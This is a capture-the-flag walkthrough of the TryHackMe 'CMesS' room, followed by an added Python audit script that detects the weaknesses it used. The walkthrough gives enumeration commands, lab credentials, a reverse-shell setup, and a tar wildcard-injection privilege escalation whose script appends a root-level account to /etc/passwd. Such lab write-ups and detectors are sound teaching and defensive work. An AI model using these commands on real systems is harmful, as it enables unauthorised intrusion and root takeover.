CMesS

Room Link: https://tryhackme.com/room/cmess

Initial Scan

Kali

nmap -A cmess.thm

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 cmess.thm

TCP/80 - HTTP

Kali

gobuster dir -u http://cmess.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Mostly junk

Fuzzing Domains

Fuzzed with a long subdomain list, then filtered the output to reduce the number of results. Only one stands out: dev.

Kali

wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://cmess.thm/' -H "Host: FUZZ.cmess.thm" > results.txt

grep -v '290 W' results.txt

I added dev.cmess.thm to my hosts file and found this page

We were able to log in to the admin portal with these credentials

Username: andre@cmess.thm
Password: KPFTN_f2yxe%

Initial Shell

Exploit: https://www.exploit-db.com/raw/51569

The shell they use is bad, so I upload a new one to get a reverse shell instead

Shell Link: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Kali

nc -lvnp 1337

Upgrade to an interactive TTY (tab completion, job control)

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

We find andre's password in a backup file

Victim

cd /opt
ls -lah
cat .password.bak 

TCP/21 - SSH

Kali

ssh andre@$VICTIM
Password: UQfsdCB7aAP6

Privilege Escalation

Exploit: https://gtfobins.github.io/gtfobins/tar/

Victim

cat /etc/crontab

Victim

cd /home/andre/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch './--checkpoint-action=exec=sh shell.sh'
vi shell.sh

shell.sh

#!/bin/bash

echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd

Victim

su new
Password: 123
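An added audit script, not part of the original writeup, that checks from the defender's side for the three conditions used above: a system crontab job that runs tar over a shell wildcard in a user-writable directory, option-shaped filenames planted in that directory, and an extra UID 0 account appended to /etc/passwd. The crontab text, directory listing and passwd lines are constructed samples for the example, not output from the target.

```python
import re

# Matches a crontab command of the form "cd <dir> && tar ... *" where the
# trailing wildcard lets filenames in <dir> be parsed as tar options.
WILDCARD_TAR = re.compile(r"cd\s+(?P<dir>\S+)\s*&&\s*tar\b[^;|&]*\s\*")


def find_wildcard_tar_jobs(crontab_text):
    """Return (user, directory) for each /etc/crontab job running tar over a wildcard."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        fields = line.split(None, 6)  # min hour dom mon dow user command
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        m = WILDCARD_TAR.search(command)
        if m:
            hits.append((user, m.group("dir")))
    return hits


def find_injected_tar_options(filenames):
    """Return names in a backup directory that tar would read as options (leading '-')."""
    return sorted(n for n in filenames if n.startswith("-"))


def find_extra_uid0_accounts(passwd_text):
    """Return usernames with UID 0 other than root, i.e. rogue superuser entries."""
    rogue = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) == 7 and parts[2] == "0" and parts[0] != "root":
            rogue.append(parts[0])
    return rogue


# Constructed sample inputs (the tar command line is an assumption, not the room's).
SAMPLE_CRONTAB = """SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/2 *   * * *   root    cd /home/andre/backups && tar -zcf /tmp/backup.tar.gz *
"""
SAMPLE_BACKUP_DIR = ["note.txt", "--checkpoint=1", "--checkpoint-action=exec=sh shell.sh", "shell.sh"]
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
andre:x:1000:1000:andre:/home/andre:/bin/bash
new:x:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    print(find_wildcard_tar_jobs(SAMPLE_CRONTAB))       # [('root', '/home/andre/backups')]
    print(find_injected_tar_options(SAMPLE_BACKUP_DIR))  # the two --checkpoint* names
    print(find_extra_uid0_accounts(SAMPLE_PASSWD))       # ['new']
```

On a live host, feed it the real /etc/crontab, the listing of the directory the job cds into, and /etc/passwd; any non-empty result is worth investigating.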
